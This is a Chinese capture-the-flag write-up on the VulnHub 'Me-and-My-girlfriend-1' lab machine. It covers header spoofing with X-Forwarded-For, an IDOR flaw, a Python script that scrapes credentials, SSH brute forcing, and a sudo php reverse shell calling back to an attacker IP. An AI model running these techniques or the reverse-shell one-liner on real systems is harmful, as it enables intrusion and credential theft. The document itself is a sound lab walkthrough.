靶机实战-vuluhub系列-Me-and-My-girlfriend-1

简介: 靶机实战-vuluhub系列-Me-and-My-girlfriend-1

靶机下载地址

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

环境搭建

攻击机:192.168.56.102

靶机Me-and-My-girlfriend-1:192.168.56.101

信息收集

扫描局域网内存在的主机(arp-scan)发现靶机IP为192.168.56.101


640.png

端口扫描(nmap)发现开放了22端口和80端口

640.png

漏洞挖掘


尝试爆破22端口(hydra),爆破无果。


b3c73fcbb6fb9ceab6e85d6aef0978a2.png


80端口入手,只能本地才能访问

4701ced53fb452a620c51e38ceb54686.png

使用谷歌插件ModHeader设置X-Forwarded-For为127.0.0.1

X-Forwarded:获得HTTP请求端真实的IP,在代理转发及反向代理中经常使用X-Forwarded-For 字段。


a5b093ecc38773508d8fd0ad340b497d.png

有一个登录页面,尝试万能密码,sql注入。经过测试,不存在万能密码和sql注入。


e681df99612beba825fdbf968a333ac8.png


来到注册功能处,注册一个普通用户,账号密码为admin,邮箱:123@qq.com

b4248a192a03c60a17ecf6ad32f3b617.png

登录进去,观察url,可能存在sql注入和水平越权,测试后发现不存在sql注入,但存在水平越权漏洞。

033a953b4725727388e950aa402eb1d5.png

user_id=1,成功越权到eweuhtandingan用户

d0af32a8357948bd3c5c1a33fc33fa64.png

f12可直接查看用户的密码


fb2ec7e5a9c11618d81ce4c8cb2339b4.png


kali自带工具crunch生成1-999的字典

5d54a3b2eb2c90b30d978ee85c6f074d.png

使用burp进行抓包进行枚举用户

5356a17432981315c231410a195a6c0b.png

存在用户1,2,3,4,5,9,12,13

收集账号密码

0937b6e1c89b82297c33a60eb0a114c0.png

也可用python脚本进行用户遍历收集账号密码生成字典文件


import requestsimport re
for user_id in range(1,14):    url = "http://192.168.56.101/?page=profile&user_id=" + str(user_id)    #print(url)    headers={        'User-Agent': 'Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.106Safari/537.36',        'X-Forwarded-For': '127.0.0.1',        'Cookie': 'PHPSESSID=laj6g176m70i272au6dte5ceq2'    }    r = requests.get(url=url,headers=headers)    r1 = r.text    #print(r1)    if 'username' in r.text:        um=re.findall(r'id="username" value="(.*?)"',r1,re.I | re.M)  #正则匹配账号        um1=[str(i) for i in um]        um2=''.join(um1)        #print(um2)        f = open('账号.txt','a+')        text = f.write(um2+'\n')    if 'password' in r.text:        pd = re.findall(r'id="password" value="(.*?)"',r1,re.I | re.M) #正则匹配密码        pd1 = [str(i) for i in pd]        pd2 = ''.join(pd1)        f = open('密码.txt','a+')        text1 = f.write(pd2+'\n')

运行脚本会生成账号.txt和密码.txt的字典文件

5bfc4e5121b79a3675d265406e7e66be.png

爆破22端口(超级弱口令检查工具),成功爆破出ssh账号密码:alice/4lic3

a3047c8f8966583284a2790934bf9d43.png

成功连接ssh,在网站根目录下发现数据库连接的文件,里面有数据库的账号和密码

a20dc554a33be02a859b14cf6e4fc9e1.png

连接数据库进行查看

79c9cf6374e5c3225dd2357c7c0e0f2f.png


6256c58cf333fe3346368f721224f818.png

ls -la查看隐藏文件或隐藏目录,在.my_secret隐藏目录下发现flag1

28dd35b0a78df0b37d010bce2d0e1650.png

提权(sudo提权)

1、只能使用上面数据库的账号密码:root/ctf_pasti_bisa

b79c4e5b285870fff192301ad212b889.png

使用su 进行登录得到flag2


4f60582c6f814ba69ddcedfe735bf5e0.png


2、sudo -l查看特权用户,发现php是root权限

06f65a3daf86b8f706efc59331ea8019.png

在靶机的 alice 用户下创建一个 PHP 反弹 shell,指定 Kali 的 IP 和监听的端口,回车之后即可反弹 shell


sudo /usr/bin/php -r '$sock=fsockopen("192.168.56.102",7777);exec("/bin/bash -i <&3 >&3 2>&3");'

7bb5897f7a27d78551b6680755892d74.png

成功提权拿到flag2




相关文章
|
10月前
|
Ubuntu 定位技术 TensorFlow
源码编译安装ROCm以运行tensorflow-rocm(适用于Ubuntu 23.04)
总结一番,完成这趟奇妙的技术之旅后,乐趣多多,还能享受 tensorflow-rocm 带来的便利和速度。这趟旅程需要耐心,勇气,以及对技术的热爱。朋友,做好准备,让你的Ubuntu系统展翅高飞吧!
536 9
|
存储 Android开发 索引
鸿蒙特效教程10-卡片展开/收起效果
本教程将详细讲解如何在HarmonyOS中实现卡片的展开/收起效果,通过这个实例,你将掌握ArkUI中状态管理和动画实现的核心技巧。
492 6
鸿蒙特效教程10-卡片展开/收起效果
|
网络协议 数据库 网络架构
OSPF的邻居状态机详解
OSPF的邻居状态机详解
856 6
|
存储 Java 编译器
使用ASM来书写Java代码
使用ASM来书写Java代码
238 0
|
存储 SQL 开发框架
文件上传漏洞 原理利用防御实战
文件上传漏洞 原理利用防御实战
|
JSON Java 数据格式
Java系列之:生成JSON字符串
这篇文章介绍了两种在Java中生成JSON字符串的方法:使用`JSONObject`类及其`toJSONString`方法来动态生成,以及手动拼接字符串的方式来创建JSON格式的字符串。
Java系列之:生成JSON字符串
|
缓存 安全
HTTP.SYS漏洞(MS_15_034)漏洞发现与防护
通过nmap扫描发现80端口开放,后续使用msfconsole确认了MS_15_034(HTTP.SYS)漏洞的存在,攻击模块触发目标服务器蓝屏。随后进行漏洞加固,禁用IIS缓存,经msf攻击验证,加固措施有效,服务器未受影响。
954 0
|
小程序 开发工具 Android开发
微信小程序开发工具的使用,各个配置文件详解,小程序开发快速入门(二)
微信小程序开发工具的使用,各个配置文件详解,小程序开发快速入门(二)
1211 0
|
存储 算法 C++
【C++ 包装器类 map】C++ 标准库(std)中的map结构 哈希表(unordered_map)和黑红树(map)教程
【C++ 包装器类 map】C++ 标准库(std)中的map结构 哈希表(unordered_map)和黑红树(map)教程
1512 1
|
Web App开发 存储 安全
Vulnhub靶场之Me-and-My-Girlfriend(一)
Vulnhub靶场之Me-and-My-Girlfriend
478 0
Vulnhub靶场之Me-and-My-Girlfriend(一)